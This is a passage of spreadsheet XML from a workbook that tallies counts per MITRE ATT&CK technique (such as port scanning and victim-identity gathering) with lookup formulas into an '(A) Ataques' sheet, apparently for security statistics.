        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!DB98,"")</f>
        <v>62</v>
      </c>
      <c r="AW98" s="20">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",'(A) Ataques'!DC98,"")</f>
        <v>6351</v>
      </c>
      <c r="AX98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($AT98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY98" s="469">
        <f>'(A) Ataques'!LU98+'(A) Ataques'!MA98+'(A) Ataques'!MG98+'(A) Ataques'!MM98+'(A) Ataques'!MS98</f>
        <v>611</v>
      </c>
      <c r="AZ98" s="510">
        <f>'(A) Ataques'!LW98+'(A) Ataques'!MC98+'(A) Ataques'!MI98+'(A) Ataques'!MO98+'(A) Ataques'!MU98</f>
        <v>460</v>
      </c>
      <c r="BA98" s="471">
        <f>'(A) Ataques'!LY98+'(A) Ataques'!ME98+'(A) Ataques'!MK98+'(A) Ataques'!MQ98+'(A) Ataques'!MW98</f>
        <v>6</v>
      </c>
      <c r="BB98" s="471">
        <f>'(A) Ataques'!LQ98</f>
        <v>459</v>
      </c>
      <c r="BC98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($AY98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD98" s="469">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!LL98,"")</f>
        <v>14512</v>
      </c>
      <c r="BE98" s="510">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!LM98,"")</f>
        <v>14361</v>
      </c>
      <c r="BF98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!LN98,"")</f>
        <v>6</v>
      </c>
      <c r="BG98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!LO98,"")</f>
        <v>3</v>
      </c>
      <c r="BH98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!LS98,"")</f>
        <v>6951</v>
      </c>
      <c r="BI98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($BD98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ98" s="469">
        <f>'(A) Ataques'!OL98+'(A) Ataques'!OR98+'(A) Ataques'!OX98+'(A) Ataques'!PD98+'(A) Ataques'!PJ98</f>
        <v>696786</v>
      </c>
      <c r="BK98" s="510">
        <f>'(A) Ataques'!ON98+'(A) Ataques'!OT98+'(A) Ataques'!OZ98+'(A) Ataques'!PF98+'(A) Ataques'!PL98</f>
        <v>7026</v>
      </c>
      <c r="BL98" s="471">
        <f>'(A) Ataques'!OP98+'(A) Ataques'!OV98+'(A) Ataques'!PB98+'(A) Ataques'!PH98+'(A) Ataques'!PN98</f>
        <v>2</v>
      </c>
      <c r="BM98" s="495">
        <f>'(A) Ataques'!OH98</f>
        <v>6941</v>
      </c>
      <c r="BN98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($BJ98=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO98" s="469">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!OC98,"")</f>
        <v>696786</v>
      </c>
      <c r="BP98" s="510">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!OD98,"")</f>
        <v>7026</v>
      </c>
      <c r="BQ98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!OE98,"")</f>
        <v>2</v>
      </c>
      <c r="BR98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!OF98,"")</f>
        <v>1</v>
      </c>
      <c r="BS98" s="471">
        <f>IF('(A) Ataques'!$AP98&lt;&gt;"NO",'(A) Ataques'!OJ98,"")</f>
        <v>6941</v>
      </c>
      <c r="BT98" s="331">
        <f>IF('(A) Ataques'!$AK98&lt;&gt;"NO",IF($BO98=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="99" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A99" s="79">
        <f t="shared" si="1"/>
        <v>97</v>
      </c>
      <c r="B99" s="4">
        <f>IF('(A) Ataques'!AK99&lt;&gt;"NO",'(A) Ataques'!E99,"")</f>
        <v>67</v>
      </c>
      <c r="C99" s="6" t="str">
        <f>IF('(A) Ataques'!AK99&lt;&gt;"NO",IF('(A) Ataques'!M99="","",'(A) Ataques'!M99),"")</f>
        <v>T1589.002-Gather_victim_identity_information</v>
      </c>
      <c r="D99" s="4" t="str">
        <f>IF('(A) Ataques'!AK99&lt;&gt;"NO",'(A) Ataques'!F99,"")</f>
        <v>T1589</v>
      </c>
      <c r="E99" s="286">
        <f>IF('(A) Ataques'!AK99&lt;&gt;"NO",'(A) Ataques'!AQ99,"")</f>
        <v>7</v>
      </c>
      <c r="F99" s="288">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!BB99,"")</f>
        <v>14</v>
      </c>
      <c r="G99" s="392">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!BD99,"")</f>
        <v>7</v>
      </c>
      <c r="H99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!BF99,"")</f>
        <v>1</v>
      </c>
      <c r="I99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!BG99,"")</f>
        <v>7</v>
      </c>
      <c r="J99" s="530">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($F99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BH99,"")</f>
        <v>0</v>
      </c>
      <c r="L99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BJ99,"")</f>
        <v>0</v>
      </c>
      <c r="M99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BL99,"")</f>
        <v>0</v>
      </c>
      <c r="N99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BM99,"")</f>
        <v>0</v>
      </c>
      <c r="O99" s="532">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($K99=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P99" s="292">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BN99,"")</f>
        <v>14</v>
      </c>
      <c r="Q99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BP99,"")</f>
        <v>7</v>
      </c>
      <c r="R99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BR99,"")</f>
        <v>1</v>
      </c>
      <c r="S99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BS99,"")</f>
        <v>7</v>
      </c>
      <c r="T99" s="530">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($P99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BT99,"")</f>
        <v>14</v>
      </c>
      <c r="V99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BV99,"")</f>
        <v>7</v>
      </c>
      <c r="W99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BX99,"")</f>
        <v>1</v>
      </c>
      <c r="X99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$BY99,"")</f>
        <v>7</v>
      </c>
      <c r="Y99" s="532">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($U99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z99" s="288">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!BZ99,"")</f>
        <v>1</v>
      </c>
      <c r="AA99" s="392">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!CB99,"")</f>
        <v>1</v>
      </c>
      <c r="AB99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!CD99,"")</f>
        <v>1</v>
      </c>
      <c r="AC99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!CE99,"")</f>
        <v>1</v>
      </c>
      <c r="AD99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF(Z99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CF99,"")</f>
        <v>15</v>
      </c>
      <c r="AF99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CH99,"")</f>
        <v>8</v>
      </c>
      <c r="AG99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CJ99,"")</f>
        <v>2</v>
      </c>
      <c r="AH99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CK99,"")</f>
        <v>7</v>
      </c>
      <c r="AI99" s="287">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($AE99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ99" s="292">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CL99,"")</f>
        <v>0</v>
      </c>
      <c r="AK99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CN99,"")</f>
        <v>0</v>
      </c>
      <c r="AL99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CP99,"")</f>
        <v>0</v>
      </c>
      <c r="AM99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CQ99,"")</f>
        <v>0</v>
      </c>
      <c r="AN99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($AJ99=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CR99,"")</f>
        <v>0</v>
      </c>
      <c r="AP99" s="322">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CT99,"")</f>
        <v>0</v>
      </c>
      <c r="AQ99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CV99,"")</f>
        <v>0</v>
      </c>
      <c r="AR99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!$CW99,"")</f>
        <v>0</v>
      </c>
      <c r="AS99" s="287">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($AO99=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT99" s="288">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!CX99,"")</f>
        <v>14</v>
      </c>
      <c r="AU99" s="392">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!CZ99,"")</f>
        <v>7</v>
      </c>
      <c r="AV99" s="4">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!DB99,"")</f>
        <v>1</v>
      </c>
      <c r="AW99" s="20">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",'(A) Ataques'!DC99,"")</f>
        <v>7</v>
      </c>
      <c r="AX99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($AT99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY99" s="469">
        <f>'(A) Ataques'!LU99+'(A) Ataques'!MA99+'(A) Ataques'!MG99+'(A) Ataques'!MM99+'(A) Ataques'!MS99</f>
        <v>0</v>
      </c>
      <c r="AZ99" s="510">
        <f>'(A) Ataques'!LW99+'(A) Ataques'!MC99+'(A) Ataques'!MI99+'(A) Ataques'!MO99+'(A) Ataques'!MU99</f>
        <v>0</v>
      </c>
      <c r="BA99" s="471">
        <f>'(A) Ataques'!LY99+'(A) Ataques'!ME99+'(A) Ataques'!MK99+'(A) Ataques'!MQ99+'(A) Ataques'!MW99</f>
        <v>0</v>
      </c>
      <c r="BB99" s="471">
        <f>'(A) Ataques'!LQ99</f>
        <v>0</v>
      </c>
      <c r="BC99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($AY99=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD99" s="469">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!LL99,"")</f>
        <v>7</v>
      </c>
      <c r="BE99" s="510">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!LM99,"")</f>
        <v>7</v>
      </c>
      <c r="BF99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!LN99,"")</f>
        <v>0</v>
      </c>
      <c r="BG99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!LO99,"")</f>
        <v>1</v>
      </c>
      <c r="BH99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!LS99,"")</f>
        <v>7</v>
      </c>
      <c r="BI99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($BD99=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ99" s="469">
        <f>'(A) Ataques'!OL99+'(A) Ataques'!OR99+'(A) Ataques'!OX99+'(A) Ataques'!PD99+'(A) Ataques'!PJ99</f>
        <v>0</v>
      </c>
      <c r="BK99" s="510">
        <f>'(A) Ataques'!ON99+'(A) Ataques'!OT99+'(A) Ataques'!OZ99+'(A) Ataques'!PF99+'(A) Ataques'!PL99</f>
        <v>0</v>
      </c>
      <c r="BL99" s="471">
        <f>'(A) Ataques'!OP99+'(A) Ataques'!OV99+'(A) Ataques'!PB99+'(A) Ataques'!PH99+'(A) Ataques'!PN99</f>
        <v>0</v>
      </c>
      <c r="BM99" s="495">
        <f>'(A) Ataques'!OH99</f>
        <v>0</v>
      </c>
      <c r="BN99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($BJ99=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO99" s="469">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!OC99,"")</f>
        <v>0</v>
      </c>
      <c r="BP99" s="510">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!OD99,"")</f>
        <v>0</v>
      </c>
      <c r="BQ99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!OE99,"")</f>
        <v>0</v>
      </c>
      <c r="BR99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!OF99,"")</f>
        <v>0</v>
      </c>
      <c r="BS99" s="471">
        <f>IF('(A) Ataques'!$AP99&lt;&gt;"NO",'(A) Ataques'!OJ99,"")</f>
        <v>0</v>
      </c>
      <c r="BT99" s="331">
        <f>IF('(A) Ataques'!$AK99&lt;&gt;"NO",IF($BO99=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="100" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A100" s="79">
        <f t="shared" si="1"/>
        <v>98</v>
      </c>
      <c r="B100" s="4">
        <f>IF('(A) Ataques'!AK100&lt;&gt;"NO",'(A) Ataques'!E100,"")</f>
        <v>68</v>
      </c>
      <c r="C100" s="6" t="str">
        <f>IF('(A) Ataques'!AK100&lt;&gt;"NO",IF('(A) Ataques'!M100="","",'(A) Ataques'!M100),"")</f>
        <v>T1595.002-Port_Scanning</v>
      </c>
      <c r="D100" s="4" t="str">
        <f>IF('(A) Ataques'!AK100&lt;&gt;"NO",'(A) Ataques'!F100,"")</f>
        <v>T1595</v>
      </c>
      <c r="E100" s="286">
        <f>IF('(A) Ataques'!AK100&lt;&gt;"NO",'(A) Ataques'!AQ100,"")</f>
        <v>2058</v>
      </c>
      <c r="F100" s="288">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!BB100,"")</f>
        <v>41</v>
      </c>
      <c r="G100" s="392">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!BD100,"")</f>
        <v>41</v>
      </c>
      <c r="H100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!BF100,"")</f>
        <v>6</v>
      </c>
      <c r="I100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!BG100,"")</f>
        <v>31</v>
      </c>
      <c r="J100" s="530">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($F100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BH100,"")</f>
        <v>36</v>
      </c>
      <c r="L100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BJ100,"")</f>
        <v>35</v>
      </c>
      <c r="M100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BL100,"")</f>
        <v>13</v>
      </c>
      <c r="N100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BM100,"")</f>
        <v>25</v>
      </c>
      <c r="O100" s="532">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($K100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P100" s="292">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BN100,"")</f>
        <v>77</v>
      </c>
      <c r="Q100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BP100,"")</f>
        <v>76</v>
      </c>
      <c r="R100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BR100,"")</f>
        <v>19</v>
      </c>
      <c r="S100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BS100,"")</f>
        <v>51</v>
      </c>
      <c r="T100" s="530">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($P100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BT100,"")</f>
        <v>66</v>
      </c>
      <c r="V100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BV100,"")</f>
        <v>66</v>
      </c>
      <c r="W100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BX100,"")</f>
        <v>14</v>
      </c>
      <c r="X100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$BY100,"")</f>
        <v>49</v>
      </c>
      <c r="Y100" s="532">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($U100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z100" s="288">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!BZ100,"")</f>
        <v>59</v>
      </c>
      <c r="AA100" s="392">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!CB100,"")</f>
        <v>51</v>
      </c>
      <c r="AB100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!CD100,"")</f>
        <v>21</v>
      </c>
      <c r="AC100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!CE100,"")</f>
        <v>36</v>
      </c>
      <c r="AD100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF(Z100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CF100,"")</f>
        <v>125</v>
      </c>
      <c r="AF100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CH100,"")</f>
        <v>117</v>
      </c>
      <c r="AG100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CJ100,"")</f>
        <v>35</v>
      </c>
      <c r="AH100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CK100,"")</f>
        <v>63</v>
      </c>
      <c r="AI100" s="287">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($AE100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ100" s="292">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CL100,"")</f>
        <v>0</v>
      </c>
      <c r="AK100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CN100,"")</f>
        <v>0</v>
      </c>
      <c r="AL100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CP100,"")</f>
        <v>0</v>
      </c>
      <c r="AM100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CQ100,"")</f>
        <v>0</v>
      </c>
      <c r="AN100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($AJ100=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CR100,"")</f>
        <v>4</v>
      </c>
      <c r="AP100" s="322">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CT100,"")</f>
        <v>4</v>
      </c>
      <c r="AQ100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CV100,"")</f>
        <v>2</v>
      </c>
      <c r="AR100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!$CW100,"")</f>
        <v>4</v>
      </c>
      <c r="AS100" s="287">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($AO100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT100" s="288">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!CX100,"")</f>
        <v>81</v>
      </c>
      <c r="AU100" s="392">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!CZ100,"")</f>
        <v>80</v>
      </c>
      <c r="AV100" s="4">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!DB100,"")</f>
        <v>21</v>
      </c>
      <c r="AW100" s="20">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",'(A) Ataques'!DC100,"")</f>
        <v>55</v>
      </c>
      <c r="AX100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($AT100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY100" s="469">
        <f>'(A) Ataques'!LU100+'(A) Ataques'!MA100+'(A) Ataques'!MG100+'(A) Ataques'!MM100+'(A) Ataques'!MS100</f>
        <v>24</v>
      </c>
      <c r="AZ100" s="510">
        <f>'(A) Ataques'!LW100+'(A) Ataques'!MC100+'(A) Ataques'!MI100+'(A) Ataques'!MO100+'(A) Ataques'!MU100</f>
        <v>20</v>
      </c>
      <c r="BA100" s="471">
        <f>'(A) Ataques'!LY100+'(A) Ataques'!ME100+'(A) Ataques'!MK100+'(A) Ataques'!MQ100+'(A) Ataques'!MW100</f>
        <v>3</v>
      </c>
      <c r="BB100" s="471">
        <f>'(A) Ataques'!LQ100</f>
        <v>20</v>
      </c>
      <c r="BC100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($AY100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD100" s="469">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!LL100,"")</f>
        <v>60</v>
      </c>
      <c r="BE100" s="510">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!LM100,"")</f>
        <v>52</v>
      </c>
      <c r="BF100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!LN100,"")</f>
        <v>3</v>
      </c>
      <c r="BG100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!LO100,"")</f>
        <v>11</v>
      </c>
      <c r="BH100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!LS100,"")</f>
        <v>36</v>
      </c>
      <c r="BI100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($BD100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ100" s="469">
        <f>'(A) Ataques'!OL100+'(A) Ataques'!OR100+'(A) Ataques'!OX100+'(A) Ataques'!PD100+'(A) Ataques'!PJ100</f>
        <v>20</v>
      </c>
      <c r="BK100" s="510">
        <f>'(A) Ataques'!ON100+'(A) Ataques'!OT100+'(A) Ataques'!OZ100+'(A) Ataques'!PF100+'(A) Ataques'!PL100</f>
        <v>20</v>
      </c>
      <c r="BL100" s="471">
        <f>'(A) Ataques'!OP100+'(A) Ataques'!OV100+'(A) Ataques'!PB100+'(A) Ataques'!PH100+'(A) Ataques'!PN100</f>
        <v>7</v>
      </c>
      <c r="BM100" s="495">
        <f>'(A) Ataques'!OH100</f>
        <v>18</v>
      </c>
      <c r="BN100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($BJ100=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO100" s="469">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!OC100,"")</f>
        <v>20</v>
      </c>
      <c r="BP100" s="510">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!OD100,"")</f>
        <v>20</v>
      </c>
      <c r="BQ100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!OE100,"")</f>
        <v>7</v>
      </c>
      <c r="BR100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!OF100,"")</f>
        <v>5</v>
      </c>
      <c r="BS100" s="471">
        <f>IF('(A) Ataques'!$AP100&lt;&gt;"NO",'(A) Ataques'!OJ100,"")</f>
        <v>18</v>
      </c>
      <c r="BT100" s="331">
        <f>IF('(A) Ataques'!$AK100&lt;&gt;"NO",IF($BO100=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A101" s="79">
        <f t="shared" si="1"/>
        <v>99</v>
      </c>
      <c r="B101" s="4">
        <f>IF('(A) Ataques'!AK101&lt;&gt;"NO",'(A) Ataques'!E101,"")</f>
        <v>68</v>
      </c>
      <c r="C101" s="6" t="str">
        <f>IF('(A) Ataques'!AK101&lt;&gt;"NO",IF('(A) Ataques'!M101="","",'(A) Ataques'!M101),"")</f>
        <v>T1595.003-Web_page_scanning1</v>
      </c>
      <c r="D101" s="4" t="str">
        <f>IF('(A) Ataques'!AK101&lt;&gt;"NO",'(A) Ataques'!F101,"")</f>
        <v>T1595</v>
      </c>
      <c r="E101" s="286">
        <f>IF('(A) Ataques'!AK101&lt;&gt;"NO",'(A) Ataques'!AQ101,"")</f>
        <v>181</v>
      </c>
      <c r="F101" s="288">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!BB101,"")</f>
        <v>0</v>
      </c>
      <c r="G101" s="392">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!BD101,"")</f>
        <v>0</v>
      </c>
      <c r="H101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!BF101,"")</f>
        <v>0</v>
      </c>
      <c r="I101" s="20">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!BG101,"")</f>
        <v>0</v>
      </c>
      <c r="J101" s="530">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",IF($F101=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BH101,"")</f>
        <v>0</v>
      </c>
      <c r="L101" s="322">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BJ101,"")</f>
        <v>0</v>
      </c>
      <c r="M101" s="4">
        <f>IF('(A) Ataques'!$AK101&lt;&gt;"NO",'(A) Ataques'!$BL101,"")</f>
        <v>0</v>
      </c>
      <c r="N101" s="20">
